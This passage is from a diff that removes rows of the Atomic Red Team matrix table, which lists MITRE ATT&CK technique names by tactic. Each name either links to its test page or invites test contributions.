-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
-| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
-| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Unix Shell](../../T1059.004/T1059.004.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Remote Access Software](../../T1219/T1219.md) | |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
-| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
-| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
-| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
-| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Rc.common](../../T1037.004/T1037.004.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
-| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
